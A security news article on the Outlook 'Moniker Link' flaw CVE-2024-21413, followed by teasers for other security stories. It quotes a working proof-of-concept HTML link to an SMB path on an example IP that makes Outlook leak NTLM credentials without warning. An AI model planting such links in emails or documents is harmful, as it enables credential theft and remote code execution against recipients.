
The warning refers to the CVE-2024-21413 Microsoft Outlook Improper Input Validation Vulnerability discovered last year by Check Point Research experts. The bug affects a number of Office products, including Microsoft Office LTSC 2021, Microsoft 365 Apps for Enterprise, Microsoft Outlook 2016, and Microsoft Office 2019.
The security hole results in remote code execution when an e-mail with malicious links is opened using a vulnerable version of Microsoft Outlook. Successful exploitation of this vulnerability enables an attacker to bypass the Office Protected View and open malicious Office files in edit mode.
Such attacks can result in the leaking of local NTLM credentials and remote code execution (RCE).
Importantly, the Preview Pane can also be used as an attack vector since CVE-2024-21413 can be exploited when malicious documents are previewed.
The vulnerability, dubbed Moniker Link by Check Point Research analysts, makes it possible to bypass Outlook protection against malicious links embedded in emails by using the file:/
construct. All the attacker has to do is add a !
character to the URL that points to an attacker-controlled server.
The exclamation mark is added immediately after the document extension along with arbitrary text (Check Point Research used the word “something” in its example):
<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>
Such a link bypasses Outlook restrictions, and Outlook gains access to the remote resource \\\
when the link is clicked. Importantly, no warnings or errors are displayed.
According to the experts, the vulnerability is related to the MkParseDisplayName API and can affect other software that uses it.
As CISA reports, the security hole is actively exploited and has been added to the Known Exploited Vulnerabilities (KEV) catalog.
“These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise,” – CISA.

2025.01.26 — Cisco patched a critical vulnerability in Meeting Management
Cisco released updates to fix a critical (CVSS score: 9.9) vulnerability in Meeting Management. The bug enables an unprivileged remote authenticated attacker to gain administrative privileges. The vulnerability…
Full article →
2025.03.10 — Nearly a million Windows computers impacted by a malvertising campaign
According to Microsoft, nearly 1 million Windows devices fell victim to a sophisticated malvertising campaign in recent months. Cybercriminals were able to steal credentials, cryptocurrency, and sensitive…
Full article →
2025.03.18 — Black Basta ransomware group developed its own automated brute-forcing framework
According to EclecticIQ, Black Basta Ransomware-as-a-Service (RaaS) group has developed its own automated brute-forcing framework dubbed BRUTED. It's used to hack edge network devices…
Full article →
2025.01.30 — Hackers use vulnerabilities in SimpleHelp RMM to attack corporate networks
Experts believe that recently patched vulnerabilities in SimpleHelp Remote Monitoring and Management (RMM) were used by attackers to gain initial access to corporate networks. A number…
Full article →
2025.01.27 — Zyxel firewalls reboot due to flawed update
Zyxel warned its customers that a recent signature update may cause critical errors in USG FLEX and ATP series firewalls. As a result, devices go into…
Full article →
2025.02.10 — Failed attempt to block phishing link results in massive Cloudflare outage
According to the incident report released by Cloudflare, an attempt to block a phishing URL on the R2 platform accidentally caused a massive outage; as a result, many Cloudflare…
Full article →
2025.02.21 — Microsoft fixes vulnerability in Power Pages exploited by cybercriminals
Microsoft patched a severe privilege escalation vulnerability in Power Pages used by hackers as a 0-day. The vulnerability tracked as CVE-2025-24989 (CVSS score 8.2) pertains…
Full article →
2025.02.28 — Qualcomm extends support for Android devices to 8 years
Qualcomm Technologies announced its collaboration with Google with the purpose to provide extended support for OEM devices running on company's flagship chipsets. This partnership will…
Full article →
2025.02.20 — Newly-discovered vulnerabilities in OpenSSH open the door to MiTM and DoS attacks
OpenSSH fixed two vulnerabilities that could result in MiTM and denial of service (DoS) attacks. Interestingly, one of these bugs appeared in the code more than 10…
Full article →
2025.04.25 — Asus patches vulnerability in AMI's MegaRAC enabling attackers to brick servers
Asus released patches for the CVE-2024-54085 vulnerability that allows attackers to seize and disable servers. The security hole affects the American Megatrends International (AMI) MegaRAC Baseboard Management…
Full article →